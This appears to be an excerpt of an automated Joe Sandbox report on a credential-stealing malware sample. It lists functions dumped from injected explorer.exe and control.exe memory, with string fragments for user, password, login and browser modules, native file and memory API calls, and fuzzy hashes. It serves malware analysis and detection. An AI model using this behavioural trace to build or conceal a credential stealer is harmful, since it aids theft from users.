., xrefs: 121B13B0
n, xrefs: 121B13E7
v, xrefs: 121B14A0
e, xrefs: 121B148E
, xrefs: 121B147C

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: bea9ae41cc01b936f8bb62901db54dbbbfc3a3b3c2390b0ca37a333540f75973
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 2E71B432658B498FD758DF68C4847AAB7F1FF59304F00062FE44AC7261EB71E9468B81

Uniqueness

Uniqueness Score: -1.00%

Function 121ACC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 121ACC64
shel, xrefs: 121ACC90
dll, xrefs: 121ACC9E
ole3, xrefs: 121ACC5D
l32., xrefs: 121ACC97

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 0c14f4e062a23900e7f4cc2ff8246114bc59dbad9d49db821a46ce258d6ee10f
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 2F514DB1954B4D8FDB64DF64C0446EAB7F1FF58300F40462ED49AE7214EF30A5418B89

Uniqueness

Uniqueness Score: -1.00%

Function 121AD86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

vers, xrefs: 121AD8E4
4, xrefs: 121AD9E9
\, xrefs: 121AD9E0
dll, xrefs: 121AD8F4
ion., xrefs: 121AD8EC

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: e16556df3d2e47dc7a2fa87b1ad545c5dd724531df54dd50f2a21f48de43e967
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 4F414C36258B888FCBA5EF3498557EAB3E4FB98305F41462E989EC7240EF30D545C782

Uniqueness

Uniqueness Score: -1.00%

Function 121AF4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

user, xrefs: 121AF4D3
sspi, xrefs: 121AF50E
dll, xrefs: 121AF51C
32.d, xrefs: 121AF4DA
cli., xrefs: 121AF515

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 7cbc3559f9c4820c2dd4a89c6af28dee91d41513ad6f6af2ab418fdc1b4dd380
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: DD417B36A58E4D9FCB94EF68D4A43AE77E1FB58300F51416AA80AD7280DA31D541CB82

Uniqueness

Uniqueness Score: -1.00%

Function 121AD432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 121AD53F
el32, xrefs: 121AD537
h, xrefs: 121AD51F
kern, xrefs: 121AD52A

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: c7b0bd046cbed2c465a1702e1ca123e13c74483e07ac5674be1b76c392c084a9
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: DE418F75A08B898FD7A9CF2880943AAB7E1FB98304F504A6E949EC3255DB70D545CB81

Uniqueness

Uniqueness Score: -1.00%

Function 121B40B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 121B4154
f fr, xrefs: 121B413D
om:, xrefs: 121B4146
, xrefs: 121B4184

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: c0f7075c88349367513f08c6295a56b6016710253226ce96909233b01b7927d1
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: BE31DE36508B886FC75ADB28C0846EAB7F4FF94300F50491EE49BC7251EA31A54ACA42

Uniqueness

Uniqueness Score: -1.00%

Function 121B40C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 121B4154
f fr, xrefs: 121B413D
om:, xrefs: 121B4146
, xrefs: 121B4184

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: e20507851b3038057f6e831e472e75f5bea5189f08df59a5c71e08eebc9a5923
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: F431E176948B486FD75ADB28C4846EAB7F5FFA4300F40491EE49BC7251EE30E506CA43

Uniqueness

Uniqueness Score: -1.00%

Function 121AFFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

me_c, xrefs: 121AFFEE
chro, xrefs: 121B0023
.dll, xrefs: 121AFFFE
hild, xrefs: 121AFFF6

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 1ba1827d61fe27b1ffdf232469bac3c1d766e918f3327a6a82a3135d31dfdab1
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: FF313B76258A488FC784EF688495BAAB6F1FF98301F84466DD44ACB254DE30D505CB92

Uniqueness

Uniqueness Score: -1.00%

Function 121AFFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

me_c, xrefs: 121AFFEE
chro, xrefs: 121B0023
.dll, xrefs: 121AFFFE
hild, xrefs: 121AFFF6

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 0dc699417a99478e6f9992f8730ab96d68e68ee06c45a70f9a6e13baa8352add
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: CB315C76258B488FC784DF688494BAAB7F1FF98300F84462DD44ACB254DF30D505CB92

Uniqueness

Uniqueness Score: -1.00%

Function 121B28C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 121B291E
urlmon.dll, xrefs: 121B2959
User-Agent: , xrefs: 121B2935, 121B2948
on.d, xrefs: 121B2902

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 137addd70211b5d4fa8b58071920b9faf0f89d3322861a10b7e4bb9f55392615
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 1A31C032614A0D8FCB45EFA8C8847EDB7F1FF58314F40022AD84ED7240DE7496458B89

Uniqueness

Uniqueness Score: -1.00%

Function 121B28BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 121B291E
urlmon.dll, xrefs: 121B2959
User-Agent: , xrefs: 121B2935, 121B2948
on.d, xrefs: 121B2902

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 73fe537fbef8ef9fc14c5ffc124ea1b712cf31e439ff064ec836e4f1e6d429fe
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 7921C132650A5D8ECB45EFA8C8947EDBBB5FF5C304F40422AE85AD7240DE7496058B89

Uniqueness

Uniqueness Score: -1.00%

Function 121B3E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 121B3F03
l, xrefs: 121B3F26
., xrefs: 121B3F1F
t, xrefs: 121B3EF4

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: c47e16f481e89e1a860051d68ab169749bdb15ed15257ea4c73627ca8700841b
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 04218D75A64A0D9FDB48EFA8C0447EDBAF1FF18304F50462ED009D3600DB75A551CB84

Uniqueness

Uniqueness Score: -1.00%

Function 121B3E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 121B3F03
l, xrefs: 121B3F26
., xrefs: 121B3F1F
t, xrefs: 121B3EF4

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 5e88d674f09a8ebd4198b42d20b10c61404da0fd285e40df3334924ba4e92808
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 6E215A79A64A0D9FDB48EFA8D0447E9BBF1FF18314F50462ED409D3600DB75A5528B84

Uniqueness

Uniqueness Score: -1.00%

Function 121B3FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 121B4015
pass, xrefs: 121B4022
logi, xrefs: 121B403C
auth, xrefs: 121B402F

Memory Dump Source

Source File: 00000003.00000002.5877002201.0000000012110000.00000040.00000001.00040000.00000000.sdmp, Offset: 12110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12110000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 504bf63dfe178e3b534b9a5e74d9996b884c1804ca9d2d52563465bfcec946d3
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: E821DF31A64B0D8BCB45CF9D98907EEB7F2EF88344F004659E40AEB244D7B0E9158BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exePID: 4716, Parent PID: 4744COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	0%
Total number of Nodes:	688
Total number of Limit Nodes:	79

Executed Functions

Function 02B2A34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02B24BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B24BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02B2A39D

Strings

.z`, xrefs: 02B2A38D, 02B2A398

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 0730cd2aaa76f97af82fbb43258cbec149c291d9dc640adf8199242e04b6f1e7
Instruction ID: 70956bc664c570d456de16c7b8019b1bda3d76bdaa4076306828ad6ac17a7ddb
Opcode Fuzzy Hash: 0730cd2aaa76f97af82fbb43258cbec149c291d9dc640adf8199242e04b6f1e7
Instruction Fuzzy Hash: 8401B2B6205508BFCB08CF98DC94EEB37AAAF8C754F158248BA1DD7240C630EC118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02B24BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B24BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02B2A39D

Strings

.z`, xrefs: 02B2A38D, 02B2A398

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 99493ca5b79fe77d14c0fecfdbf520daa9a9fca45fbd51f7b335b13cd59c540f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 11F0BDB2210208AFCB08CF88DC84EEB77ADAF8C754F158248BA1D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A3FA Relevance: 1.6, APIs: 1, Instructions: 73
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(02B24D62,5EB65239,FFFFFFFF,02B24A21,?,?,02B24D62,?,02B24A21,FFFFFFFF,5EB65239,02B24D62,?,00000000), ref: 02B2A445

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2362ee5102aaec1c744eb77fd13eaa93d60ede62897ea6bda6f6c55bb3082f76
Instruction ID: 944d990909083b362a9ea24749191dd069d751d6d9565b165188e5e7c427160e
Opcode Fuzzy Hash: 2362ee5102aaec1c744eb77fd13eaa93d60ede62897ea6bda6f6c55bb3082f76
Instruction Fuzzy Hash: 1A2129B6210149AFCB18DF99DC90DEB77A9FF8C314B15868DF95C97212C234E8558BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02B24D62,5EB65239,FFFFFFFF,02B24A21,?,?,02B24D62,?,02B24A21,FFFFFFFF,5EB65239,02B24D62,?,00000000), ref: 02B2A445

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 673fc4dcdbea1ace431db48be371f8db29dc0780f437cf7236cf91386e4e4379
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 3BF0B7B2210208AFCB14DF89DC80EEB77ADEF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B12D11,00002000,00003000,00000004), ref: 02B2A569

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 10bd3352a972045bdd91cdbf918b734ea5fb3c886e1fc41c64c7b2e1e1637e81
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: E2F015B2210218AFCB14DF89CC80EAB77ADAF88754F118148BE1C97241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A52A Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B12D11,00002000,00003000,00000004), ref: 02B2A569

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 9ff77a714a7c0f0050e8463b2884c14b645466c7b3a324d10e9db52095d13bd2
Instruction ID: 5b0d112d790bce06fb993682a444d5b49fb835bfc0dd2841828543de63d97cd1
Opcode Fuzzy Hash: 9ff77a714a7c0f0050e8463b2884c14b645466c7b3a324d10e9db52095d13bd2
Instruction Fuzzy Hash: 90F08CB2100149ABCB14EF58DC80CE7BBA8FF88220B05865DF99CA7206C230E815CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02B24D40,?,?,02B24D40,00000000,FFFFFFFF), ref: 02B2A4A5

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: f6d60e05fbcca9336f5f56213f28a5174b778fd4571372cf3ca8e8066603cbbd
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 78D01776200314ABD710EB98CC85FA77BADEF48760F154499BA1C9B242C530FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2CFA

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2653baf8ab9bd43dc3cf70c77d600cfb2da316f04befafb7bb8f5c1ebd61e975
Instruction ID: 963c9fa921e1423f27ed29e565846cc3a4b0a95143d1029bbf49bd609f6be008
Opcode Fuzzy Hash: 2653baf8ab9bd43dc3cf70c77d600cfb2da316f04befafb7bb8f5c1ebd61e975
Instruction Fuzzy Hash: A8900221242441527955B1585504607401697E0385791C416B1405A64CC536E856F721

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2C3A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 911cfe00701aa141513437a4cd983854a2dafbb162f9df4df512b5772cd69e35
Instruction ID: d8192db6d2b34f69e1ce8af29e396fc4a15457b98e7b6569df95dae9656fd4f8
Opcode Fuzzy Hash: 911cfe00701aa141513437a4cd983854a2dafbb162f9df4df512b5772cd69e35
Instruction Fuzzy Hash: 5F90022921340002F5907158650870A001587D1346F91D819B000666CCC925D8697321

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2DCA

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a5d8cdef199a4bf47a0c788dfa5c832e2ba5d4d5de0d44277551eee50c40a2b
Instruction ID: ab453f6387ba50c51afbe0143eb422a554f2d4266d32815933e87345ae4b83f4
Opcode Fuzzy Hash: 3a5d8cdef199a4bf47a0c788dfa5c832e2ba5d4d5de0d44277551eee50c40a2b
Instruction Fuzzy Hash: B990027120140402F55071585504746001587D0345F51C415B5055668EC669DDD57765

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2D1A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db11a951654cc7bf455aa2d9e76fbf4d48b15fb036801817e95c22b4523a38ab
Instruction ID: ca3b4a1f96749d7f758c3d487413e7b0736c861144648639ff7d8447fc94ac50
Opcode Fuzzy Hash: db11a951654cc7bf455aa2d9e76fbf4d48b15fb036801817e95c22b4523a38ab
Instruction Fuzzy Hash: FF90023120140413F52171585604707001987D0385F91C816B041566CDD666D952B221

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2E5A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a5f31d158fad26109c867ff9611662fec57593fb3172f1effa1f80bf0b694e5
Instruction ID: 31fb822b3d43c17dae6890a26ac19e8f0dccf8638c09cf624c4710242abf63f8
Opcode Fuzzy Hash: 7a5f31d158fad26109c867ff9611662fec57593fb3172f1effa1f80bf0b694e5
Instruction Fuzzy Hash: BA90026134140442F51071585514B060015C7E1345F51C419F1055668DC629DC527226

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2F0A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33cfbe096139b3a7da17ae5a451297e841795f41eaacd4a1f76de2f637f82221
Instruction ID: a4e4d58b405261899c50efff40033ae012ada52beb0c0448ab517cf8ecacef6d
Opcode Fuzzy Hash: 33cfbe096139b3a7da17ae5a451297e841795f41eaacd4a1f76de2f637f82221
Instruction Fuzzy Hash: F8900221211C0042F61075685D14B07001587D0347F51C519B0145668CC925D8617621

Uniqueness

Uniqueness Score: -1.00%

Function 04CF29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF29FA

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

